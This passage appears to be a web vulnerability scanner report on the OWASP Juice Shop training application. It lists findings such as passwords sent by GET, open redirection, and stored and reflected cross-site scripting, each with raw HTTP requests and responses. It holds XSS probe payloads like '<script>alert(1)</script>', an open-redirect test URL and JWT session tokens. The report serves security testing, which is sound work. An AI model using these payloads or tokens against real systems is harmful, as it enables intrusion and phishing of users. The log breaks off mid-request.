The library name and its version are identified based on a Retire.js signature. If the library identification is not correct, the prior vulnerability does not apply.

Request 1

GET /bower_components/jquery/dist/jquery.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=Ji9iYLhA0a_FezL5AAAA
DNT: 1
Connection: close
Cache-Control: max-age=0

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Tue, 28 Apr 2015 16:03:04 GMT
ETag: W/"1499c-14d00c472c0"
Content-Type: application/javascript
Content-Length: 84380
Date: Sun, 15 Jan 2017 21:00:23 GMT
Connection: close

/*! jQuery v2.1.4 | (c) 2005, 2015 jQuery Foundation, Inc. | jquery.org/license */
!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a)
...[SNIP]...

8. Password submitted using GET method

There are 3 instances of this issue:

Issue background

Some applications use the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passwords into the URL increases the risk that they will be captured by an attacker.

Vulnerabilities that result in the disclosure of users' passwords can result in compromises that are extremely difficult to investigate due to obscured audit trails. Even if the application itself only handles non-sensitive information, exposing passwords puts users who have re-used their password elsewhere at risk.

8.1. http://192.168.61.143:3000/dist/juice-shop.min.js

Summary

Severity:   Low
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /dist/juice-shop.min.js

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password fields:

Request 1

GET /dist/juice-shop.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=Ji9iYLhA0a_FezL5AAAA
DNT: 1
Connection: close
Cache-Control: max-age=0

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
ETag: W/"10e10-15942f5a540"
Content-Type: application/javascript
Content-Length: 69136
Date: Sun, 15 Jan 2017 21:00:23 GMT
Connection: close

angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
...[SNIP]...
<div>\n\n <form role="form" name="form" novalidate>\n\n <div class="alert-info" ng-show="confirmation && !form.$dirty">
...[SNIP]...
</label>\n <input type="password" class="form-control input-sm" id="currentPassword" name="currentPassword" ng-model="currentPassword" required/>\n </div>
...[SNIP]...
</label>\n <input type="password" class="form-control input-sm" id="newPassword" name="newPassword" ng-model="newPassword" required ng-minlength="5" ng-maxlength="20"/>\n </div>
...[SNIP]...
</label>\n <input type="password" class="form-control input-sm" id="newPasswordRepeat" name="newPasswordRepeat" ng-model="newPasswordRepeat" required/>\n </div>
...[SNIP]...

8.2. http://192.168.61.143:3000/dist/juice-shop.min.js

Summary

Severity:   Low
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /dist/juice-shop.min.js

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password fields:

Request 1

GET /dist/juice-shop.min.js HTTP/1.1
Host: 192.168.61.143:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.61.143:3000/
Cookie: io=Ji9iYLhA0a_FezL5AAAA
DNT: 1
Connection: close
Cache-Control: max-age=0

Response 1

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Accept-Ranges: bytes
Cache-Control: public, max-age=0
Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
ETag: W/"10e10-15942f5a540"
Content-Type: application/javascript
Content-Length: 69136
Date: Sun, 15 Jan 2017 21:00:23 GMT
Connection: close

angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
...[SNIP]...
</h3>\n\n <form role="form" name="form" novalidate>\n\n <div class="alert-danger" ng-show="form.$invalid && form.$dirty">
...[SNIP]...
</label>\n <input type="password" class="form-control input-sm" id="userPassword" name="userPassword" ng-model="user.password" required ng-minlength="5" ng-maxlength="20"/>\n </div>
...[SNIP]...
</label>\n <input type="password" class="form-control input-sm" id="userPasswordRepeat" name="userPasswordRepeat" ng-model="user.passwordRepeat" required/>\n </div>
...[SNIP]...

8.3. http://192.168.61.143:3000/dist/juice-shop.min.js

Summary

Severity:   Low
Confidence:   Certain
Host:   http://192.168.61.143:3000
Path:   /dist/juice-shop.min.js

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password fields:

    Request 1

    GET /dist/juice-shop.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=_u0wPeQi82ftthU7AAAB; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
    ETag: W/"10e10-15942f5a540"
    Content-Type: application/javascript
    Content-Length: 69136
    Date: Sun, 15 Jan 2017 21:02:00 GMT
    Connection: close

    angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
    ...[SNIP]...
    </h3>\n\n <form role="form" name="form" novalidate>\n\n <div class="alert-danger" ng-show="form.$invalid && form.$dirty">
    ...[SNIP]...
    </label>\n <input type="password" class="form-control input-sm" id="userPassword" name="userPassword" ng-model="user.password" required ng-minlength="5" ng-maxlength="20"/>\n </div>
    ...[SNIP]...
    </label>\n <input type="password" class="form-control input-sm" id="userPasswordRepeat" name="userPasswordRepeat" ng-model="user.passwordRepeat" required/>\n </div>
    ...[SNIP]...
    9. Open redirection

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /redirect

    Issue detail

    The value of the to request parameter is used to perform an HTTP redirect. The payload http://awpvwa81ir2/a?https://github.com/bkimminich/juice-shop was submitted in the to parameter. This caused a redirection to the following URL:

    Issue background

    Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application that causes a redirection to an arbitrary external domain. This behavior can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain and with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

    References

    Request 1

    GET /redirect?to=http%3a%2f%2fawpvwa81ir2%2fa%3fhttps%3a%2f%2fgithub.com%2fbkimminich%2fjuice-shop HTTP/1.1
    Host: 192.168.61.143:3000
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close

    Response 1

    HTTP/1.1 302 Found
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Location: http://awpvwa81ir2/a?https://github.com/bkimminich/juice-shop
    Vary: Accept
    Content-Type: text/plain; charset=utf-8
    Content-Length: 83
    Date: Sun, 15 Jan 2017 21:20:26 GMT
    Connection: close

    Found. Redirecting to http://awpvwa81ir2/a?https://github.com/bkimminich/juice-shop
    10. Password field with autocomplete enabled

    There are 3 instances of this issue:

    Issue background

    Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications that employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

    The stored credentials can be captured by an attacker who gains control over the user's computer. Further, an attacker who finds a separate application vulnerability such as cross-site scripting may be able to exploit this to retrieve a user's browser-stored credentials.

    10.1. http://192.168.61.143:3000/dist/juice-shop.min.js

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /dist/juice-shop.min.js

    Issue detail

    The page contains a form with the following action URL:

    The form contains the following password fields with autocomplete enabled:

    Request 1

    GET /dist/juice-shop.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
    ETag: W/"10e10-15942f5a540"
    Content-Type: application/javascript
    Content-Length: 69136
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
    ...[SNIP]...
    <div>\n\n <form role="form" name="form" novalidate>\n\n <div class="alert-info" ng-show="confirmation && !form.$dirty">
    ...[SNIP]...
    </label>\n <input type="password" class="form-control input-sm" id="currentPassword" name="currentPassword" ng-model="currentPassword" required/>\n </div>
    ...[SNIP]...
    </label>\n <input type="password" class="form-control input-sm" id="newPassword" name="newPassword" ng-model="newPassword" required ng-minlength="5" ng-maxlength="20"/>\n </div>
    ...[SNIP]...
    </label>\n <input type="password" class="form-control input-sm" id="newPasswordRepeat" name="newPasswordRepeat" ng-model="newPasswordRepeat" required/>\n </div>
    ...[SNIP]...
    10.2. http://192.168.61.143:3000/dist/juice-shop.min.js

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /dist/juice-shop.min.js

    Issue detail

    The page contains a form with the following action URL:

    The form contains the following password field with autocomplete enabled:

    Request 1

    GET /dist/juice-shop.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
    ETag: W/"10e10-15942f5a540"
    Content-Type: application/javascript
    Content-Length: 69136
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
    ...[SNIP]...
    </h3>\n\n <form role="form" name="form" novalidate>\n\n <div class="alert-danger" ng-show="error && !form.$dirty">
    ...[SNIP]...
    </label>\n <input type="password" class="form-control input-sm" id="userPassword" name="userPassword" ng-model="user.password" required/>\n </div>
    ...[SNIP]...
    10.3. http://192.168.61.143:3000/dist/juice-shop.min.js

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /dist/juice-shop.min.js

    Issue detail

    The page contains a form with the following action URL:

    The form contains the following password fields with autocomplete enabled:

    Request 1

    GET /dist/juice-shop.min.js HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=Ji9iYLhA0a_FezL5AAAA
    DNT: 1
    Connection: close
    Cache-Control: max-age=0

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Accept-Ranges: bytes
    Cache-Control: public, max-age=0
    Last-Modified: Wed, 28 Dec 2016 01:05:12 GMT
    ETag: W/"10e10-15942f5a540"
    Content-Type: application/javascript
    Content-Length: 69136
    Date: Sun, 15 Jan 2017 21:00:23 GMT
    Connection: close

    angular.module("juiceShop",["ngRoute","ngCookies","ngTouch","ngAnimate","ngFileUpload","ui.bootstrap","pascalprecht.translate","btford.socket-io","ngclipboard","base64","monospaced.qrcode"]),angular.m
    ...[SNIP]...
    </h3>\n\n <form role="form" name="form" novalidate>\n\n <div class="alert-danger" ng-show="form.$invalid && form.$dirty">
    ...[SNIP]...
    </label>\n <input type="password" class="form-control input-sm" id="userPassword" name="userPassword" ng-model="user.password" required ng-minlength="5" ng-maxlength="20"/>\n </div>
    ...[SNIP]...
    </label>\n <input type="password" class="form-control input-sm" id="userPasswordRepeat" name="userPasswordRepeat" ng-model="user.passwordRepeat" required/>\n </div>
    ...[SNIP]...
    11. Content type incorrectly stated

    Summary

    Severity:   Low
    Confidence:   Firm
    Host:   http://192.168.61.143:3000
    Path:   /socket.io/

    Issue detail

    The response states that the content type is application/octet-stream. However, it actually appears to contain unrecognized content.

    The following browsers may interpret the response as HTML:

    Issue background

    If a response specifies an incorrect content type then browsers may process the response in unexpected ways. If the content type is specified to be a renderable text-based format, then the browser will usually attempt to interpret the response as being in that format, regardless of the actual contents of the response. Additionally, some other specified content types might sometimes be interpreted as HTML due to quirks in particular browsers. This behavior might lead to otherwise "safe" content such as images being rendered as HTML, enabling cross-site scripting attacks in certain conditions.

    The presence of an incorrect content type statement typically only constitutes a security flaw when the affected resource is dynamically generated, uploaded by a user, or otherwise contains user input. You should review the contents of affected responses, and the context in which they appear, to determine whether any vulnerability exists.

    Request 1

    GET /socket.io/?EIO=3&transport=polling&t=LcZwtbX&sid=_u0wPeQi82ftthU7AAAB HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://192.168.61.143:3000/
    Cookie: io=_u0wPeQi82ftthU7AAAB
    DNT: 1
    Connection: close

    Response 1

    HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Content-Length: 5
    Access-Control-Allow-Origin: *
    Set-Cookie: io=_u0wPeQi82ftthU7AAAB; Path=/; HttpOnly
    Date: Sun, 15 Jan 2017 21:00:24 GMT
    Connection: close

    ...40
    12. Unencrypted communications

    Summary

    Severity:   Low
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /

    Issue description

    The application allows users to connect to it over unencrypted connections. An attacker suitably positioned to view a legitimate user's network traffic could record and monitor their interactions with the application and obtain any information the user supplies. Furthermore, an attacker able to modify traffic could use the application as a platform for attacks against its users and third-party websites. Unencrypted connections have been exploited by ISPs and governments to track users, and to inject adverts and malicious JavaScript. Due to these concerns, web browser vendors are planning to visually flag unencrypted connections as hazardous.

    To exploit this vulnerability, an attacker must be suitably positioned to eavesdrop on the victim's network traffic. This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi, or a corporate or home network that is shared with a compromised computer. Common defenses such as switched networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure could also perform this attack. Note that an advanced adversary could potentially target any connection made over the Internet's core infrastructure.

    Please note that using a mixture of encrypted and unencrypted communications is an ineffective defense against active attackers, because they can easily remove references to encrypted resources when these references are transmitted over an unencrypted connection.

    References

    13. Cross-site scripting (stored)

    Summary

    Severity:   Information
    Confidence:   Firm
    Host:   http://192.168.61.143:3000
    Path:   /api/Feedbacks/

    Issue detail

    The value of the comment JSON parameter submitted to the URL /api/Feedbacks/ is copied into the HTML document as plain text between tags at the URL /api/Feedbacks/. The payload zepov<a>e9216 was submitted in the comment JSON parameter. This input was returned unmodified in a subsequent request for the URL /api/Feedbacks/.

    This behavior demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behavior and attempt to identify any unusual input validation or other obstacles that may be in place.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Issue background

    Stored cross-site scripting vulnerabilities arise when user input is stored and later embedded into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

    The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

    Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP that are ultimately rendered within a web mail application).

    Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and are not hindered by web browsers' XSS filters. Depending on the affected page, ordinary users may be exploited during normal use of the application. In some situations this can be used to create web application worms that spread exponentially and ultimately exploit all active users.

    Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behavior can feasibly be used to compromise other application users.

    References

    Request 1

    POST /api/Feedbacks/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 42
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

    {"UserId":7,"comment":"zepov<a>e9216","rating":0}

    Response 1

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 168
    ETag: W/"a8-WH00EP0AVVjQTL1MG7jZVg"
    Date: Sun, 15 Jan 2017 21:11:27 GMT
    Connection: close

    {"status":"success","data":{"UserId":7,"comment":"zepov<a>e9216</a>","rating":0,"id":617,"updatedAt":"2017-01-15T21:11:27.000Z","createdAt":"2017-01-15T21:11:27.000Z"}}

    Request 2

    GET /api/Feedbacks/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Cookie: io=L4WeLfrB9u8EKpSHAAAD; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDM3MSwiZXhwIjoxNDg0NTMyMzcxfQ.UMLVLWZIfA3hk1NyZqR80RAjnwWF66IAJ7Q_UZNW-Bs
    DNT: 1
    Connection: close

    Response 2

    HTTP/1.1 200 OK
    X-Powered-By: Express
    Access-Control-Allow-Origin: *
    X-Content-Type-Options: nosniff
    X-Frame-Options: SAMEORIGIN
    Content-Type: application/json; charset=utf-8
    Content-Length: 84437
    ETag: W/"149d5-lmpdGUcgEO4yJegPboBKxg"
    Date: Sun, 15 Jan 2017 21:11:28 GMT
    Connection: close

    {"status":"success","data":[{"id":1,"comment":"I love this shop! Best juice in town! Highly recommended!","rating":5,"createdAt":"2017-01-15T20:58:05.000Z","updatedAt":"2017-01-15T20:58:05.000Z","User
    ...[SNIP]...
    datedAt":"2017-01-15T21:11:26.000Z","UserId":7},{"id":616,"comment":"alert(1)","rating":0,"createdAt":"2017-01-15T21:11:27.000Z","updatedAt":"2017-01-15T21:11:27.000Z","UserId":7},{"id":617,"comment":"zepov<a>e9216</a>
    ...[SNIP]...
    14. Cross-site scripting (reflected)

    There are 15 instances of this issue:

    Issue background

    Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request that, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

    The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

    Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site that causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

    The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality that it contains, and the other applications that belong to the same domain and organization. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain that can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organization that owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application and exploiting users' trust in the organization in order to capture credentials for other applications that it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

    References

    14.1. http://192.168.61.143:3000/api/BasketItems/ [BasketId JSON parameter]

    Summary

    Severity:   Information
    Confidence:   Certain
    Host:   http://192.168.61.143:3000
    Path:   /api/BasketItems/

    Issue detail

    The value of the BasketId JSON parameter is copied into the HTML document as plain text between tags. The payload nbxaa<script>alert(1)</script>lvtd4 was submitted in the BasketId JSON parameter. This input was echoed unmodified in the application's response.

    This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

    The request uses a Content-type header which it is not possible to generate using a standard HTML form. Burp attempted to replace this header with a standard value, to facilitate cross-domain delivery of an exploit, but this does not appear to be possible.

    The response does not state that the content type is HTML. The issue is only directly exploitable if a browser can be made to interpret the response as HTML. No modern browser will interpret the response as HTML. However, the issue might be indirectly exploitable if a client-side script processes the response and embeds it into an HTML context.

    Request 1

    POST /api/BasketItems/ HTTP/1.1
    Host: 192.168.61.143:3000
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    Referer: http://192.168.61.143:3000/
    Content-Length: 43
    Cookie: io=1uGV4rL6GpBTykvMAAAC; token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6NywiZW1haWwiOiJtaWtlX2xhbmRlY2tAaG90bWFpbC5jb20iLCJwYXNzd29yZCI6ImE5OTJiMWI0MDNjYmEyOGFmYjQyOGU3ZjVhMzVjNTE2IiwiY3JlYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIiwidXBkYXRlZEF0IjoiMjAxNy0wMS0xNSAyMTowMDo1My4wMDAgKzAwOjAwIn0sImlhdCI6MTQ4NDUxNDA2MSwiZXhwIjoxNDg0NTMyMDYxfQ.HakIy3OoWXAKsdYozvKYraW6ESTAbmWiDCBgZu9usm0
    DNT: 1
    Connection: close

